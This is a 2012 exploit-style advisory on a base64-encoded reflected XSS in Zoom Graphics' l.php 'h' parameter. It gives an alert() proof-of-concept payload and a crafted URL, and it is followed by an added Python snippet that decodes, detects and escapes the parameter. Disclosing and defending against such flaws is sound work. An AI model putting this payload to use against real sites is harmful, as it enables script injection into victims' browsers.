Zoom Graphics suffers from a base64-encoded cross-site scripting vulnerability.
d8c64e07c3d1898fe0ca51017c317208918e0982886c48f640a7dd376d71df7a
+---------------------------------------------------------------------------------------------------------+
# Exploit Title : ZOOM GRAPHICS XSS [B64] Vulnerability
# Date : 2012-08-19
# Author : Avatar Fearless
# Official Site : http://zoom.am/
# Version : x.x.x [UnKnown]
# Tested on : Windows 7 Ultimate x32
# Original Advisory : http://thefear.in/zoomam.txt
# Contact : avatar@hiphopfan.com
# Web Sites : http://anti-armenia.org/ || http://millikuvvetler.net/ || http://mexfi.org/
# Greet`Z To : Meta
+---------------------------------------------------------------------------------------------------------+
[+] Vulnerable :
http://site.tld/l.php?l=2&h=[base64 encode]
[-] Exploit :
First, take an XSS payload. Example: '><script>alert(1);</script>. Use only single quotes, not double quotes, because if double quotes are used the script
will parse them. Then encode the payload to Base64. Output: Jz48c2NyaXB0PmFsZXJ0KDEpOzwvc2NyaXB0Pg== So the URL will look like this:
http://site.tld/zoom/l.php?l=2&h=Jz48c2NyaXB0PmFsZXJ0KDEpOzwvc2NyaXB0Pg==
This is just an example.
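The check and the fix this implies for a defender, as an added example (not part of the original advisory and not the vendor's code): a filter that inspects only the raw query string never sees markup in h, so the value has to be decoded first, then escaped where it is written into HTML. It assumes the handler base64-decodes h and echoes it into the page; the function names and the first sample URL are constructed for illustration.

```python
import base64
import binascii
import html
import re
from urllib.parse import urlsplit, parse_qs

# Characters that let a decoded value close an HTML attribute or open a tag.
MARKUP = re.compile(r"[<>'\"]")

def decode_h(value):
    """Decode a base64 'h' value; return None if it is not valid base64/UTF-8."""
    value = value.replace(" ", "+")          # parse_qs turns '+' into a space
    padded = value + "=" * (-len(value) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None

def render_safe(value):
    """Mitigation: escape AFTER decoding, at the point of output into HTML."""
    decoded = decode_h(value)
    return "" if decoded is None else html.escape(decoded, quote=True)

def flag_request(url):
    """Detection: True when the decoded 'h' parameter carries HTML metacharacters."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for value in query.get("h", []):
        decoded = decode_h(value)
        if decoded is not None and MARKUP.search(decoded):
            return True
    return False

# Constructed sample requests (not real traffic). The second is the
# advisory's own example URL; the first is a benign value made up here.
SAMPLES = [
    "http://site.tld/l.php?l=2&h=" + base64.b64encode(b"Summer gallery").decode(),
    "http://site.tld/zoom/l.php?l=2&h=Jz48c2NyaXB0PmFsZXJ0KDEpOzwvc2NyaXB0Pg==",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(flag_request(url), url)
    print(render_safe("Jz48c2NyaXB0PmFsZXJ0KDEpOzwvc2NyaXB0Pg=="))
```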
[?] About :
For More Info Contact me.
[@]
Respect To :
All My Bro*S
AA Team
MF Team
MKT Team
+---------------------------------------------------------------------------------------------------------+